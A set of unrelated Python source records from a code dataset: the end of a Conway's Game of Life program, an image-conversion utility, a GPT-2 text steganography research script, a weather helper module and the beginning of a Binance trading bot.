c:\n if c[(x, y)] == 'a':\n cell(coord).visible = True\n elif c[(x, y)] == 'd':\n grid(coord).visible = True\n elif c[(x, y)] == 'da':\n c[(x, y)] = 'a'\n cell(coord).visible = True\n '''\n#-------------------------------------vvvv--------------------------------------\n #self.go = False\n#-------------------------------------^^^^--------------------------------------\n #print('Stopping...')\n#-------------------------------MOUSE_CLICK-------------------------------------\n def mouse(self, event):\n if self.go == False:\n x = floor(event.x / 50) * 50\n y = floor(event.y / 50) * 50\n coord = (x, y)\n if x >= 0 and y >= 0 and x < gridnumber * 50 and y < gridnumber * 50:\n c[coord] = 'p'\n if c[coord] == 'a':\n print('test')\n c[coord] = 'd'\n grid(coord).visible = True\n else:\n c[coord] = 'a'\n cc.append(coord)\n cell(coord).visible = True\n#-----------------------------MOVE_TO_NEXT_GEN----------------------------------\n def r(self, event):\n self.go = not self.go\n if self.go == True:\n print('Running...')\n else:\n self.go = False\n print('Stopping...')\n#----------------------------------CLEAR----------------------------------------\n def c(self, event):\n print('Clearing...')\n x = 0\n for i in range(gridnumber):\n row(x)\n x += 50\n c.clear()\n exist = 0\n cc = []\n coordlist = []\n check = []\n neighbor = []\n#-----------------------------------UPDATE--------------------------------------\n def s(self, event):\n if c == {}:\n 
print('There are no alive cells')\n else:\n print(\"Printing status of cells\")\n print(c)\n print('Done')\n#====================================RUN=======================================\nmyapp = map(ScreenWidth, ScreenHeight)\nmyapp.run()\n","sub_path":"conway.py","file_name":"conway.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
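The four printed rules boil down to: a cell is live in the next generation iff it has exactly three live neighbors, or it is live and has exactly two. A minimal sprite-free sketch of one generation over a set of live coordinates (independent of the ggame classes above):

from itertools import product

def life_step(live):
    # count the live neighbors of every cell adjacent to a live cell
    counts = {}
    for (x, y) in live:
        for dx, dy in product((-1, 0, 1), repeat=2):
            if (dx, dy) != (0, 0):
                cell = (x + dx, y + dy)
                counts[cell] = counts.get(cell, 0) + 1
    return {c for c, n in counts.items() if n == 3 or (n == 2 and c in live)}

blinker = {(0, 1), (1, 1), (2, 1)}
assert life_step(blinker) == {(1, 0), (1, 1), (1, 2)}
assert life_step(life_step(blinker)) == blinker   # period-2 oscillator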
+{"seq_id":"311974393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAIM utility functions.\n\"\"\"\n\n\n# ----------------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------------\n\n# Standard library modules\nimport base64\nimport pathlib\nfrom io import BytesIO\n\n# Third-party modules\nfrom PIL import Image\n\n# First-party modules\nfrom deepux1_metrics.ux1.src.core.constants import IMAGE_QUALITY_JPEG\n\n# ----------------------------------------------------------------------------\n# Metadata\n# ----------------------------------------------------------------------------\n\n__author__ = \"Markku Laine\"\n__date__ = \"2020-08-21\"\n__email__ = \"markku.laine@aalto.fi\"\n__version__ = \"1.0\"\n\n\n# ----------------------------------------------------------------------------\n# Utility functions\n# ----------------------------------------------------------------------------\n\n\ndef read_image(filepath: pathlib.Path) -> str:\n \"\"\"\n Read an image from a file.\n\n Args:\n filepath: Input image file path\n\n Returns:\n Image encoded in Base64\n \"\"\"\n with open(filepath, \"rb\") as f:\n image_base64: str = base64.b64encode(f.read()).decode(\"utf-8\")\n\n return image_base64\n\n\ndef write_image(image_base64: str, filepath: pathlib.Path):\n \"\"\"\n Write an image to a file.\n\n Args:\n image_base64: Image encoded in Base64\n filepath: Output image file path\n \"\"\"\n with open(filepath, \"wb\") as f:\n f.write(base64.b64decode(image_base64))\n\n\ndef convert_image(\n png_image: str, jpeg_image_quality: int = IMAGE_QUALITY_JPEG\n) -> str:\n \"\"\"\n Convert an image from PNG to JPEG, encoded in Base64.\n\n (Semi-)transparent pixels are replaced with (semi-)white pixels in\n the output JPEG image.\n\n Args:\n png_image: PNG image encoded in Base64\n\n Kwargs:\n jpeg_image_quality: JPEG image quality (defaults to 70)\n\n Returns:\n JPEG image encoded in Base64\n \"\"\"\n img_rgb: Image.Image = Image.open(\n BytesIO(base64.b64decode(png_image))\n ).convert(\"RGB\")\n buffered: BytesIO = BytesIO()\n img_rgb.save(buffered, format=\"JPEG\", quality=jpeg_image_quality)\n jpeg_image_base64: str = base64.b64encode(buffered.getvalue()).decode(\n \"utf-8\"\n )\n\n return jpeg_image_base64\n","sub_path":"deepux1_metrics/ux1/src/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"391064093","text":"import numpy as np\nimport bitarray\nimport sys\nimport re\nimport math\nimport argparse\nimport csv\nfrom utils import get_model, encode_context, dfs\n\nfrom arithmetic import encode_arithmetic, decode_arithmetic\nfrom block_baseline import get_bins, encode_block, decode_block\nfrom huffman_baseline import encode_huffman, decode_huffman\nfrom sample import sample\nfrom saac import encode_saac, decode_saac\n# from base64 import *\nimport re\nimport pandas as pd\n\n# -----------------------------------------------------\n# | Harvard NLP project edited by Kieran |\n# | Feature SAAC, Arithmetic, Bins, Huffman implemen- |\n# | tations on linguistic Steganography based on Text |\n# | Generation Language Model. The Basic openAI GPT-2 |\n# | language model have been included in the directo- |\n# | ry pretrained_model. Usage mentioned below. |\n# -----------------------------------------------------\n\n# Usage:\n# python run_single.py [-mode] [-unicode_enc] [-block_size] [-temp] [-precision] [-topk] [-nucleus] [-device] [-finish_sent] [-delta] [-language_model]\n\n# Simply Usage:\n# python run_single.py\n# python run_single.py -mode \"huffman\"\n# python run_single.py -mode \"saac\" -nucleus 0.98\n\n# API likely:\n# message_str: string to be hidden. 需要被隐写的人名,比如 'Kieran'\n# context: the context related to the text generation procedure. 上下文CONTEXT,此处更改为使用同目录中其他文件\n# message: Binary stream Based on message_str. text --arithmetic encode--> binary stream 根据隐写信息(人名)编码得到的二进制流\n# text: covertext. generated text that contains secret information. 生成的含有隐写信息的文本 COVERTEXT\n# message_rec: binary stream extracted from stego_text. 对隐写文本进行隐写提取得到的二进制流\n# reconst: Decoded text. message_rec --arithmetic decode--> reconst 将隐写提取得到的二进制流进行解码得到的结果,合法输入应该也为人名\n# covertext_list: 将所有人名变化得到的covertext保存到的一个list中,可供调用。\n\n# env: Windows 10, python 3.6.12, torch 1.0.1, pytorch_transformers 1.1.0,\n# bitarray 1.0.1, CUDA 10, GTX1050.\n\n\ndef main(args):\n # Initial process\n args = vars(args)\n unicode_enc = args['unicode_enc'] # 选择编码方式 \n mode = args['mode'] # 选择隐写算法\n block_size = args['block_size'] # 隐写参数batch_size\n temp = args['temp'] # 隐写参数TEMPERATURE,注意下文中最好不要新建temp变量\n precision = args['precision'] # 隐写参数\n topk = args['topk'] # 文本生成相关参数\n device = args['device'] # device,文本生成相关参数,选择GPU/CPU,默认'cuda'\n finish_sent = args['finish_sent'] # 隐写参数\n nucleus = args['nucleus'] # saac相关隐写参数\n delta = args['delta'] # saac相关隐写参数\n model_name = args['language_model'] # 文本生成模型\n context_file = args['context_file'] # 上下文文件的位置\n message_str = args['name']\n # sample_tokens = 100 # 测试用变量\n\n # PARAMETERS 默认第一次的隐写信息(人名)\n # message_str = \"Chhenl\" # string to be hidden.\n\n # VALIDATE PARAMETERS 验证隐写算法\n if mode not in ['arithmetic', 'huffman', 'bins', 'saac']:\n raise NotImplementedError\n \n # 打印隐写信息(人名)\n print(\"Default plain_text is \", message_str)\n \n # 读取上下文\n f = open(context_file, 'r', encoding='utf-8')\n context = f.read()\n f.close()\n print(\"sample context is \", context) # related to the text generation procedure.\n\n # 加载文本生成模型\n print(\"loading GPT-2 LM to GPU\")\n enc, model = get_model(model_name=model_name)\n print(\"finish loading !\")\n\n print(\"implication of {}\".format(mode))\n \n # bins隐写算法的处理\n if mode == 'bins':\n bin2words, words2bin = get_bins(len(enc.encoder), block_size)\n\n # saac隐写算法的处理\n if delta and mode == \"saac\":\n nucleus = 2 ** (-1.0 * delta)\n\n\n\n # 以下注释都为旧调试过程中的注释\n # fix situation: directly encode the text.\n # print(\"directly encode the plain txt:\\n\", 
enc.encode(message_str))\n # print(\"Decode back:\\n\", enc.decode(enc.encode(message_str)))\n\n # can ensure the problem arise in the arithmetic_decode as well as the arithmetic_encode function.\n\n # ----------------------start test----------------------------\n # test_str = \"hello world.\"\n # print(\"test_str = \", test_str)\n # out = enc.encode(test_str)\n # print(\"out = \", out)\n # decode_str = enc.decode(out)\n # print(\"decode_str = \", decode_str)\n # print(\"enc.encode(decode_str) = \", enc.encode(decode_str))\n # ----------------------stop test-----------------------------\n\n # Archive Basic Initialization----------------------------------\n # print(\"plain_text is {}\".format(message_str))\n # unicode_enc = False\n # mode = 'huffman'\n # block_size = 3 # for huffman and bins\n # temp = 0.9 # for arithmetic\n # precision = 26 # for arithmetic\n # sample_tokens = 100 # for sample, delete sample\n # topk = 300\n # device = 'cuda'\n # finish_sent=False # whether or not to force finish sent. If so, stats displayed will be for non-finished sentence\n # nucleus = 0.95\n # Archive Basic Initialization----------------------------------\n\n\n\n\n\n\n first_flag = 1 # 对下文中默认处理的标志\n context_tokens = encode_context(context, enc) # 对context进行语言模型相关的编码\n\n while(1):\n # ---此处在循环中,则会不断等待输入隐写信息(人名)--------------------------------------\n # ------------------------------------------------------------------------------------\n # list_for_bpw = [] # 用于计算Bits/word参数\n # list_for_DKL = [] # 用于计算KL参数\n # list_for_seq = [] # 用于标记\n \n if first_flag == 0:\n message_str = input(\"Please reenter a new plaintext:\")\n # output_amount = len(message_str)\n \n # 得到对隐写信息(人名)的大小写集合\n message_str = message_str.upper()\n arr=list(message_str)\n generated_array = dfs(arr,0,[])\n \n first_flag = 0\n covertext_list = []\n \n for temp_count in range(0, len(generated_array)):\n # First encode message to uniform bits, without any context\n # (not essential this is arithmetic vs ascii, but it's more efficient when the message is natural language)\n \n # if temp_count > 10:\n # break # 测试时最好完成修正,此处限制输出10个COVERTEXT\n \n print(\"=\"*80)\n print(\"Altering the #{} msg_str:\".format(temp_count), message_str)\n message_str = generated_array[temp_count] # 选择一个隐写信息(比如 KiErAn)\n\n\n\n # 得到message。即上文所述的字节流\n if unicode_enc:\n ba = bitarray.bitarray()\n ba.frombytes(message_str.encode('utf-8'))\n message = ba.tolist()\n else:\n message_ctx = [enc.encoder['<|endoftext|>']]\n message_str += ''\n message = decode_arithmetic(model, enc, message_str, message_ctx, precision=40, topk=60000)\n\n\n # print(\"First encode the text to a bit sequence!\")\n # print(message) # the binary stream. 
text--arithmetic-->binary stream\n # print(\"the length is {}\".format(len(message)))\n\n # Next encode bits into cover text, using arbitrary context\n \n\n # 下方完成隐写算法,使用不同隐写算法将字节流嵌入进生成文本中,得到out经过GPT2的解码器得到COVERTEXT\n Hq = 0\n if mode == 'arithmetic':\n out, nll, kl, words_per_bit, Hq = encode_arithmetic(model, enc, message, context_tokens, temp=temp, finish_sent=finish_sent, precision=precision, topk=topk)\n elif mode == 'huffman':\n out, nll, kl, words_per_bit = encode_huffman(model, enc, message, context_tokens, block_size, finish_sent=finish_sent)\n elif mode == 'bins':\n out, nll, kl, words_per_bit = encode_block(model, enc, message, context_tokens, block_size, bin2words, words2bin, finish_sent=finish_sent)\n elif mode == 'saac':\n out, nll, kl, words_per_bit, Hq, topk_list, case_studies = encode_saac(model, enc, message, context_tokens, device=device, temp=temp, precision=precision, topk=topk, nucleus=nucleus)\n # add thing contains device='cuda', temp=1.0, precision=26, topk=50, nucleus=0.95.\n covertext = enc.decode(out)\n covertext_list.append(covertext) # 将所有COVERTEXT保存到一个结构中,可供调用\n\n\n\n # list_for_bpw.append(1/words_per_bit) # 用于计算参数\n # list_for_DKL.append(kl) # 用于计算参数\n # list_for_seq.append(temp_count) \n # print(\"=\"*40 + \" Encoding \" + \"=\"*40)\n\n # 打印结果,COVERTEXT,此处可以将covertext进行提取。\n print('#{} generated covertext:\\n'.format(temp_count), covertext) # covertext. generated covertext that contains secret information.\n print('ppl: %0.2f, kl: %0.3f, words/bit: %0.2f, bits/word: %0.2f, entropy: %.2f' % (math.exp(nll), kl, words_per_bit, 1/words_per_bit, Hq/0.69315))\n \n\n\n\n # -----------------------------------------------------------------------------------\n # 以下为隐写提取过程, 选择不同的隐写算法对covertext进行提取,得到字节流 MESSAGE_REC\n # Decode binary message from bits using the same arbitrary context\n \n # 下方在编写时可能会使用到,这里先注释掉,接收人将自己的名字和covertext输入进行判定。\n # input_name = input(\"Please input ur name:\")\n # input_covertext = input(\"Please input the covertext:\")\n # covertext = input_covertext\n\n\n if mode == 'arithmetic':\n message_rec = decode_arithmetic(model, enc, covertext, context_tokens, temp=temp, precision=precision, topk=topk)\n elif mode == 'huffman':\n message_rec = decode_huffman(model, enc, covertext, context_tokens, block_size)\n elif mode == 'bins':\n message_rec = decode_block(model, enc, covertext, context_tokens, block_size, bin2words, words2bin)\n elif mode == 'saac':\n message_rec = decode_saac(model, enc, covertext, context_tokens, device=device, temp=temp, precision=precision, topk=topk, nucleus=nucleus)\n\n # print(\"=\"*40 + \" Recovered Message \" + \"=\"*40)\n # print(message_rec) # binary stream extracted from stego_text.\n # print(\"=\" * 80)\n # Finally map message bits back to original text\n \n # 对字节流进行解码操作,最终得到的reconst变量即为最终隐写提取所得,正常使用应为人名。\n if unicode_enc:\n message_rec = [bool(item) for item in message_rec]\n ba = bitarray.bitarray(message_rec)\n reconst = ba.tobytes().decode('utf-8', 'ignore')\n else:\n reconst = encode_arithmetic(model, enc, message_rec, message_ctx, precision=40, topk=60000)\n # reconst = encode_arithmetic(model, enc, message_rec, message_ctx, temp=temp, precision=precision, topk=topk)\n # print(\"reconst[0] is\", format(reconst[0]))\n reconst = enc.decode(reconst[0])\n print(\"The decode text is \")\n print(reconst[0:-5]) # Decoded text. 
message_rec --arithmetic decode--> reconst\n \n # 这里完成基本的判断,判断此时的covertext是否指向此人名,这里对应输入设置。\n # extracted_name = reconst.upper()[0:-5]\n # if extracted_name is input_name.upper():\n # print(\"YOU ARE THE ONE! (^..^)\")\n # else:\n # print(\"PITY. ('..') \")\n\n\n\n\n\n # dataframe = pd.DataFrame({'Times':list_for_seq, 'Dkl':list_for_DKL, 'Bits/Word':list_for_bpw})\n # dataframe.to_csv(\"test_{}_temp_{}_topk_{}_prec_{}_nucleus_{:.3}.csv\".format(mode, temp, topk, precision, nucleus), index=False, sep=',')\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-unicode_enc\", type=bool, default=False, help=\"Whether open unicode encoding method.\")\n parser.add_argument(\"-mode\", type=str, default=\"saac\", help=\"Steganography Method.\")\n parser.add_argument(\"-block_size\", type=int, default=3, help=\"Block_size is for Huffman and Bins.\")\n parser.add_argument(\"-temp\", type=float, default=0.9, help=\"Temperature, for arithmetic and saac.\")\n parser.add_argument(\"-precision\", type=int, default=26, help=\"Precision is for arithmetic and saac.\")\n parser.add_argument(\"-topk\", type=int, default=300, help=\"top K Token, for arithmetic and saac.\")\n parser.add_argument(\"-nucleus\", type=float, default=0.95, help=\"Nucleus is for saac.\")\n parser.add_argument(\"-device\", type=str, default=\"cuda\", help=\"The basic calculator when applying model.\")\n parser.add_argument(\"-finish_sent\", type=bool, default=False, help=\"\")\n parser.add_argument(\"-delta\", type=float, default=0.01, help=\"delta for adaptive arithemtic encoding method.\")\n parser.add_argument(\"-language_model\", type=str, default=\"gpt2\", help=\"Basic Languages to generate text.\")\n parser.add_argument(\"-context_file\", type=str, default=\"./context.txt\", help=\"the basic context file\")\n parser.add_argument(\"-name\", type=str, default=\"Gogo\", help=\"Name, plz.\")\n args = parser.parse_args()\n # main()\n main(args)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"-plaintext\", type=str, default=\"\", help=\"your secret plaintext, use a double-quotes if necessary\")\n# parser.add_argument(\"-context\", type=str, default=\"\", help=\"context used for steganography, use a double-quotes if necessary\")\n# parser.add_argument(\"-encrypt\", type=str, default=\"arithmetic\", choices=[\"arithmetic\", \"utf8\"])\n# parser.add_argument(\"-encode\", type=str, default=\"bins\", choices=[\"bins\", \"huffman\", \"arithmetic\", \"saac\"])\n# parser.add_argument(\"-lm\", type=str, default=\"gpt2\")\n# parser.add_argument(\"-device\", type=str, default=\"0\", help=\"your gpu device id\")\n# parser.add_argument(\"-block_size\", type=int, default=4, help=\"block_size for bin/huffman encoding method\")\n# parser.add_argument(\"-precision\", type=int, default=26, help=\"precision for arithmetic encoding method\")\n# parser.add_argument(\"-temp\", type=float, default=1.0, help=\"temperature for arithemtic/huffman encoding method\")\n# parser.add_argument(\"-topK\", type=int, default=50, help=\"topK for arithemtic encoding method\")\n# parser.add_argument(\"-nucleus\", type=float, default=0.95, help=\"neclues for adaptive arithemtic encoding method\")\n# parser.add_argument(\"-delta\", type=float, default=0.01, help=\"delta for adaptive arithemtic encoding method\")\n# args = parser.parse_args()\n# main(args)\n\n# basic parameters include unicode_enc, mode, block_size, temp, precision, sample_tokens, topk, device, finish_sent, nucleus\n\n\n# 
12.30, fulfil the basic function api for further implementation.\n\n\n\n\n\n\n\n\n\n# result:\n# bins:\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n\n# arithmetic:\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# huffman:\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n\n# 第一处:message = decode_arithmetic(model, enc, message_str, message_ctx, precision=40, topk=60000)\n# 第二处:out, nll, kl, words_per_bit, Hq = encode_arithmetic(model, enc, message, context_tokens, temp=temp, finish_sent=finish_sent, precision=precision, topk=topk)\n# 前一个:message_rec = decode_arithmetic(model, enc, text, context_tokens, temp=temp, precision=precision, topk=topk)\n# 后一个:reconst = encode_arithmetic(model, enc, message_rec, message_ctx, precision=40, topk=60000)\n\n\n# [1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n# [1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0]","sub_path":"NeuralSteganography-master1/run_single_bak.py","file_name":"run_single_bak.py","file_ext":"py","file_size_in_byte":19211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"642361478","text":"import os\nimport json\nimport platform\nimport datetime\nimport binascii\n\nfrom threading import RLock\nfrom geopy import geocoders\n\nimport logging\nlogger = logging.getLogger()\n\nclass WeatherUtils:\n __lock = RLock()\n __zip_mapping = {}\n\n def get_direction(bearing):\n coords = {\n 'N': [0, 22.5],\n 'NE': [22.5, 67.5],\n 'E': [67.5, 112.5],\n 'SE': [112.5, 157.5],\n 'S': [157.5, 202.5],\n 'SW': [202.5, 247.5],\n 'W': [247.5, 292.5],\n 'NW': [292.5, 337.5],\n 'N': [337.5, 360]\n }\n for k,v in coords.items():\n if bearing >= v[0] and bearing < v[1]:\n return k\n return \"\"\n\n def get_am_pm_hour_str(timestamp):\n if platform.system() == 'Windows':\n return timestamp.strftime('%#I %p')\n else:\n return timestamp.strftime('%-I %p')\n\n def load_api_dump(url):\n if 'DEBUG' in os.environ:\n hash = binascii.crc32(url.encode('utf8'))\n debug_json = f\"/tmp/{hash}.json\"\n if os.path.exists(debug_json):\n with open(debug_json) as r:\n return json.load(r)\n\n def save_api_dump(url, r):\n if 'DEBUG' in os.environ or os.path.exists('/tmp/dump-api.flag'):\n hash = binascii.crc32(url.encode('utf8'))\n debug_json = f\"/tmp/{hash}.json\"\n with open(debug_json, \"w\") as w:\n w.write(f\"URL: {url}\\r\\n\")\n w.write(r.text)\n\n def get_gps_coordinates(zip_code):\n try:\n WeatherUtils.__lock.acquire()\n if zip_code in WeatherUtils.__zip_mapping:\n return WeatherUtils.__zip_mapping[zip_code]\n\n # geopy cannot specify zip code explicitly, so not accurate\n geolocator = geocoders.Nominatim(user_agent=\"Nook-Weather\")\n location = geolocator.geocode({\"country\":\"us\", \"postalcode\":zip_code})\n coordinates = f\"{location.latitude},{location.longitude}\"\n WeatherUtils.__zip_mapping[zip_code] = coordinates\n return coordinates\n except Exception as e:\n logger.error(f\"Failed to get gps coordinates from zip {zip_code}: {e}\")\n return None\n finally:\n WeatherUtils.__lock.release()\n","sub_path":"nook-weather/weather/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"45391548","text":"from binance.client import Client\nfrom binance.enums import *\nfrom utils.get_mac_id import get_mac\nfrom datetime import datetime\nimport api.index as api\nfrom binance.exceptions import BinanceAPIException, BinanceOrderUnknownSymbolException\nimport scripts.telegram as tel\nfrom utils.extract_coin import extract\nfrom termcolor import colored\nfrom telethon import TelegramClient, events\nimport time\nimport re\nimport math\nimport webbrowser\n\n\nclass Bot:\n def __init__(self, data, isTrial):\n self.api_key = data[\"apiKey\"]\n self.api_secret = data[\"secret\"]\n self.useTelegramCapture = str(data[\"useTelegramCapture\"]).lower()\n self.quoteOrderQty = data[\"BtcToSpend\"]\n self.take_profit = str(data[\"takeProfit\"]).lower()\n self.takeProfitAt = data[\"takeProfitAt\"]\n self.takeProfitLimit = data[\"takeProfitLimit\"]\n self.stopLoss = str(data[\"stopLoss\"]).lower()\n self.stopLossAt = data[\"stopLossAt\"]\n self.stopLossLimit = data[\"stopLossLimit\"]\n self.timeout = data[\"Timeout\"]\n self.client = Client(self.api_key, self.api_secret)\n self.isTrial = isTrial\n self.tp_order_id, self.sl_order_id, self.oco_order = False, False, False\n self.tp_triggered, self.sl_triggered = False, False\n if self.useTelegramCapture == \"true\":\n self.initialise_telegram_client(data)\n\n def initialise_telegram_client(self, data):\n self.telegram_App_id = data[\"telegram_App_id\"]\n self.telegram_api_hash = data[\"telegram_api_hash\"]\n self.channel_id = data[\"channel_id\"]\n self.Test_channel_id = data[\"Test_channel_id\"]\n self.coin_extract_status = False\n self.coin_symbol = \"\"\n self.telegram_client = TelegramClient(\n \"anon\", self.telegram_App_id, self.telegram_api_hash\n )\n\n def create_market_order(self):\n try:\n order = self.client.order_market_buy(\n symbol=self.coin_symbol,\n quoteOrderQty=self.quoteOrderQty,\n )\n return order\n except BinanceAPIException as e:\n print(colored(f\"Market Buy Error - {e}\", \"red\"))\n\n def create_market_order_sell(self):\n try:\n order = self.client.order_market_sell(\n symbol=self.coin_symbol,\n quantity=self.quantity_brought,\n )\n return order\n except BinanceAPIException as e:\n print(colored(f\"Market Sell Error - {e}\", \"red\"))\n\n def float_precision(self, f, n):\n n = int(math.log10(1 / float(n)))\n f = math.floor(float(f) * 10 ** n) / 10 ** n\n f = \"{:0.0{}f}\".format(float(f), n)\n return str(int(f)) if int(n) == 0 else f\n\n def get_price(self):\n price = None\n tickers = self.client.get_all_tickers()\n for ticker in tickers:\n if ticker[\"symbol\"] == self.coin_symbol:\n price = float(ticker[\"price\"])\n return price\n\n def get_info(self):\n try:\n tick_size = None\n step_size = None\n symbol_info = self.client.get_symbol_info(self.coin_symbol)\n for filt in symbol_info[\"filters\"]:\n if filt[\"filterType\"] == \"PRICE_FILTER\":\n tick_size = float(filt[\"tickSize\"])\n elif filt[\"filterType\"] == \"LOT_SIZE\":\n step_size = float(filt[\"stepSize\"])\n return tick_size, step_size\n except TypeError as e:\n print(colored(f\"Wrong Coin Name Entered - {e}\", \"red\"))\n\n def get_asset_info(self):\n try:\n self.tick_size, self.step_size= self.get_info()\n except TypeError as e:\n print(colored(f\"Wrong Coin Name Entered - {e}\", \"red\"))\n\n def Average(self, lst):\n return sum(lst) / len(lst)\n\n def calculate_target_price(self, price, percent_change, loss):\n if loss:\n final_price = price - ((percent_change / 100) * price)\n else:\n final_price = price + ((percent_change / 100) * price)\n 
